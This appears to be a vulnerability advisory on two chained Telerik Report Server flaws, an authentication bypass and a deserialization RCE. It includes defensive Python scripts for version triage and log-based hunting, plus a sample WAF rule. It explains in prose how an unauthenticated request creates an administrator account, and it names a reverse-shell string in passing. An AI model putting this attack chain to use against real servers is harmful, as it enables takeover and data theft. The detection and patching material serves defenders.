CVE-2024-4358 and CVE-2024-1800 in Progress Telerik Report Server allow unauthorized access and remote code execution. Here's what we know.
On May 31, Sina Kheirkhah, a security researcher with the Summoning Team, published the discovery of an exploit chain involving two vulnerabilities, CVE-2024-4358 and CVE-2024-1800, in Progress Telerik Report Server, a report management solution.
These vulnerabilities present serious risks to organizations utilizing this software, with potential implications ranging from unauthorized access to remote code execution (RCE).
Here’s what we know:
Affected products: Progress Telerik Report Server
Product category: Report management
Severity: Critical; CVSS 9.9 (CVE-2024-1800), 9.8 (CVE-2024-4358)
Type: Authentication bypass (CVE-2024-4358) chained with insecure deserialization (CVE-2024-1800) to reach remote code execution (RCE)
Impact: Confidentiality (H), Integrity (H), Availability (H)
PoC: Public (Summoning Team exploit chain)
Exploited in the wild: Yes
CISA KEV Catalog: No at the time of writing (CISA added CVE-2024-4358 to the catalog on June 13, 2024)
Remediation action: Update to the latest version of Progress Telerik Report Server
MITRE advisory: CVE-2024-4358, CVE-2024-1800
CVE-2024-4358 is an authentication bypass vulnerability in Progress Telerik Report Server. It lets an unauthenticated remote attacker reach functionality that is only meant to be available during initial installation and, through it, obtain administrative access to the application.
According to ZDI-24-561, the Register method of the server's setup flow does not validate the current installation step, so the account-registration step can be invoked again after installation has finished. Kheirkhah and security researcher Soroush Dalili describe the same root cause in the Summoning Team blog: the setup endpoint remains reachable without authentication once the administrator has completed setup, and a single crafted request to it creates a new user with System Administrator privileges.
Because the attacker ends up with a legitimate administrator account rather than a forged session, everything that follows looks like ordinary administrative activity inside the application, which is why the vendor asks administrators to review the user list (see the mitigation section). The vulnerability has been assigned a CVSS score of 9.8 by both the vendor and ZDI.
CVE-2024-1800 is a critical remote code execution (RCE) vulnerability in Progress Telerik Report Server. It allows an authenticated attacker to execute arbitrary code on the server, potentially taking full control of the host.
The root cause is insecure deserialization, not command injection: the server deserializes attacker-controlled report data without adequately validating it, so a user who can create or modify a report can supply a serialized object that executes code when the server processes it. ZDI rates the flaw 9.9 because an account is required, although a low-privileged one suffices; in the Summoning Team chain, CVE-2024-4358 supplies that account.
Successful exploitation leads to complete compromise of the server, allowing attackers to steal data, disrupt reporting services, or pivot further into the network.
As noted last March by Censys, “An attacker with remote access and an ability to execute malicious code on such an asset may allow such an attacker to not only interfere with reporting functionality but also to better understand a victim’s network or gain further access leveraging the Active Directory integration. Such an attack can serve as a beachhead, or beginning, on a victim organization for attackers.”
An advisory from Trend Micro's Zero Day Initiative (ZDI) indicates that a low-privileged user is required to exploit CVE-2024-1800. After identifying the authentication bypass (CVE-2024-4358), Kheirkhah worked with Dalili to "complete the deserialization chain" and combine the two flaws into RCE.
According to Kheirkhah, a specific endpoint used for setting up the Progress Telerik Report Server lacks proper authentication.
This endpoint remains accessible to unauthenticated attackers even after the admin setup is complete, allowing attackers to bypass authentication and create a user with system administrator privileges on the server.
By combining the authentication bypass flaw (CVE-2024-4358) with the insecure deserialization vulnerability (CVE-2024-1800), attackers can form an exploit chain.
This enables them to create a malicious report and execute arbitrary code on a vulnerable Progress Telerik Report Server.
If you run Progress Telerik Report Server, assume CVE-2024-4358 affects you: according to the Progress advisory, every release prior to Report Server 2024 Q2 (10.1.24.514) is vulnerable.
CVE-2024-1800 affects releases prior to Report Server 2024 Q1 (10.0.24.305). Given the critical nature of this RCE vulnerability, it is imperative to establish whether any of your instances runs an impacted version.
Check the installed version of each Report Server instance and compare it against the fixed versions in the vendor advisory and in the Summoning Team and SOCRadar write-ups. Note that an instance patched for CVE-2024-1800 but not updated to 2024 Q2 is still exposed to unauthenticated account creation, which on its own gives full administrative control of the reporting application.
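The version check described above, as an added example that is not part of the original article or the vendor's tooling. The fixed release numbers are taken from the Progress advisories for the two CVEs and should be confirmed against the current advisory; the host inventory is constructed for illustration.

```python
"""Compare installed Telerik Report Server versions against the fixed releases."""
import re

# Fixed releases per the Progress advisories for these CVEs; confirm against the
# current advisory before relying on them.
FIXED_VERSIONS = {
    "CVE-2024-1800": (10, 0, 24, 305),   # Report Server 2024 Q1
    "CVE-2024-4358": (10, 1, 24, 514),   # Report Server 2024 Q2
}

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text):
    """Extract a four-part Telerik version (e.g. '10.1.24.514') as an int tuple."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no four-part version found in {text!r}")
    return tuple(int(part) for part in m.groups())


def unpatched_cves(version_text):
    """Return the CVEs still affecting this version, oldest fix first."""
    installed = parse_version(version_text)
    return [cve for cve, fixed in FIXED_VERSIONS.items() if installed < fixed]


def triage(inventory):
    """Map host -> version text to host -> open CVEs, omitting fully patched hosts.

    Unparseable version strings are reported as 'unknown' so they are never
    silently treated as patched.
    """
    report = {}
    for host, version_text in inventory.items():
        try:
            open_cves = unpatched_cves(version_text)
        except ValueError:
            report[host] = ["unknown"]
            continue
        if open_cves:
            report[host] = open_cves
    return report


# Constructed inventory (not real hosts) to exercise the check.
SAMPLE_INVENTORY = {
    "reports01": "Telerik Report Server 9.2.23.1010",
    "reports02": "10.0.24.305",
    "reports03": "10.1.24.514",
    "reports04": "version not recorded",
}

if __name__ == "__main__":
    for host, cves in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {', '.join(cves)}")
```

Feed `triage` whatever inventory source you have (CMDB export, a scan of the Report Server's About page); the point of the `unknown` entry is that a host with no recorded version stays on the list until someone looks at it.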
BleepingComputer reported the public release of the exploit chain shortly after the Summoning Team write-up, and CISA subsequently added CVE-2024-4358 to its Known Exploited Vulnerabilities catalog (June 13, 2024), confirming exploitation in the wild. With a working public PoC, administrators should treat every unpatched, internet-reachable instance as already probed and remediate immediately.
CVE-2024-1800 has drawn fewer exploitation reports than CVE-2024-4358, but it is the step that turns the bypass into code execution and the chain is public, so the potential for exploitation remains high.
Enterprise administrators should upgrade their Report Server installations promptly. CVE-2024-1800 can only be resolved by updating; for CVE-2024-4358, the Progress advisory describes a temporary URL Rewrite mitigation at the IIS level (blocking the setup endpoint) for use until the update is applied.
Progress Software also recommends reviewing the Report Server's user list at '{host}/Users/Index' for local users you did not create, since the bypass leaves behind a legitimate-looking System Administrator account rather than any trace of a forged session.
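The two checks just described (an unauthenticated setup endpoint reachable after installation, and unexpected accounts in the user list) can be combined into one hunt over the IIS logs and a user-list export. The code below is an added example, not part of the article or of the vendor's guidance. It assumes the setup endpoint is served at `/Startup/Register`, a path the article does not name and which you should confirm against the vendor advisory; the IIS log lines and the user export are constructed samples, and the export columns (`username,role,created`) are an assumed layout of what you would copy from `{host}/Users/Index`.

```python
"""Hunt for CVE-2024-4358 abuse in IIS logs and correlate with new admin accounts."""
import csv
import io
from datetime import datetime, timedelta

# Assumption: the unauthenticated setup/registration endpoint is at this path.
# The article does not name it; confirm against the vendor advisory.
SETUP_PATH = "/startup/register"

# When initial setup of this instance was completed; after this moment no
# legitimate client should POST to the setup endpoint at all.
SETUP_COMPLETED = datetime(2023, 11, 2, 14, 0, 0)

# Constructed IIS W3C extended log sample (not real traffic).
# cs-username '-' means the request was anonymous.
IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-06-01 08:02:11 10.0.0.5 GET /Report/Index - 443 alice 10.0.0.21 Mozilla/5.0 200
2024-06-01 10:15:22 10.0.0.5 GET /Startup/Register - 443 - 203.0.113.7 python-requests/2.31.0 200
2024-06-01 10:15:23 10.0.0.5 POST /Startup/Register - 443 - 203.0.113.7 python-requests/2.31.0 302
2024-06-01 10:15:40 10.0.0.5 POST /Users/Index - 443 backup_svc 203.0.113.7 python-requests/2.31.0 200
2024-06-02 09:00:00 10.0.0.5 POST /Report/Index - 443 alice 10.0.0.21 Mozilla/5.0 200
"""

# Constructed user-list export (assumed columns), as copied from {host}/Users/Index.
USERS_CSV = """username,role,created
admin,System Administrator,2023-11-02 14:00:00
alice,Report Author,2023-11-03 09:30:00
backup_svc,System Administrator,2024-06-01 10:15:24
"""


def parse_iis_log(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # skip lines that do not match the declared schema
        yield dict(zip(fields, parts))


def suspicious_setup_requests(log_text, setup_completed=SETUP_COMPLETED):
    """Anonymous POSTs to the setup endpoint after setup completed.

    A POST that the server answered with anything other than 401/403/404 is the
    bypass signature: the Register method accepted a registration it should
    have refused.
    """
    hits = []
    for row in parse_iis_log(log_text):
        when = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        if (row["cs-method"] == "POST"
                and row["cs-uri-stem"].lower() == SETUP_PATH
                and row["cs-username"] == "-"
                and when > setup_completed
                and row["sc-status"] not in ("401", "403", "404")):
            hits.append({"time": when, "src": row["c-ip"], "status": row["sc-status"]})
    return hits


def accounts_created_after(hits, users_csv, window=timedelta(minutes=10)):
    """System Administrator accounts created within `window` after a suspicious POST."""
    findings = []
    for user in csv.DictReader(io.StringIO(users_csv)):
        if user["role"] != "System Administrator":
            continue
        created = datetime.strptime(user["created"], "%Y-%m-%d %H:%M:%S")
        for hit in hits:
            if hit["time"] <= created <= hit["time"] + window:
                findings.append((user["username"], hit["src"]))
    return findings


if __name__ == "__main__":
    hits = suspicious_setup_requests(IIS_LOG)
    for hit in hits:
        print(f"setup endpoint POST from {hit['src']} at {hit['time']} -> HTTP {hit['status']}")
    for username, src in accounts_created_after(hits, USERS_CSV):
        print(f"admin account '{username}' created right after request from {src}")
```

Run it against the real IIS logs of each Report Server and a fresh copy of the user list. The correlation step matters because the account itself is ordinary: without the log hit next to it, `backup_svc` is just another administrator.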
As Help Net Security notes, vulnerabilities in Progress' enterprise products have been repeatedly targeted by attackers in recent years.
The MOVEit Transfer zero-day (CVE-2023-34362) was exploited by the Cl0p ransomware gang, impacting over 2,700 organizations. Late last year, critical vulnerabilities in WS_FTP Server were exploited shortly after PoC code was published.
The fix for CVE-2024-4358 is the Progress Telerik Report Server 2024 Q2 update (10.1.24.514), which makes the Register method honour the current installation step so the setup endpoint can no longer be used once installation is complete.
Report Server is an ASP.NET application deployed on Windows and IIS, so there is no Linux package to install: obtain the updated Report Server installer from Progress, run it on every server that hosts the Report Server web application, and confirm the new version afterwards.
CVE-2024-1800 is fixed in the 2024 Q1 update (10.0.24.305) and later, which addresses the unsafe deserialization of report data. The Q2 update contains this fix as well, so a single upgrade to the current release closes both issues.
Mitigation steps
Until the update is installed, follow the vendor's interim guidance for CVE-2024-4358: block access to the setup endpoint at the web server (the URL Rewrite approach in the Progress advisory) so unauthenticated requests never reach the Register method. A generic WAF or reverse-proxy rule to the same effect is sketched below. It is pseudo-configuration, not any product's syntax, and the path is an assumption to be confirmed against the advisory. Matching on shell strings such as "bash -i" would not help here: the server is an ASP.NET application and the CVE-2024-1800 payload is a serialized object inside a report, not a shell command.
# Illustrative rule: block the setup endpoint once initial installation is complete
waf_config:
  rules:
    - name: block_setup_endpoint_after_install
      condition:
        path_prefix: "/Startup/"   # assumed setup path; confirm against the vendor advisory
      action: "block"
For CVE-2024-1800 there is no configuration workaround. Reduce exposure by limiting which accounts can create or modify reports and by removing any account you cannot attribute, then update.
Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: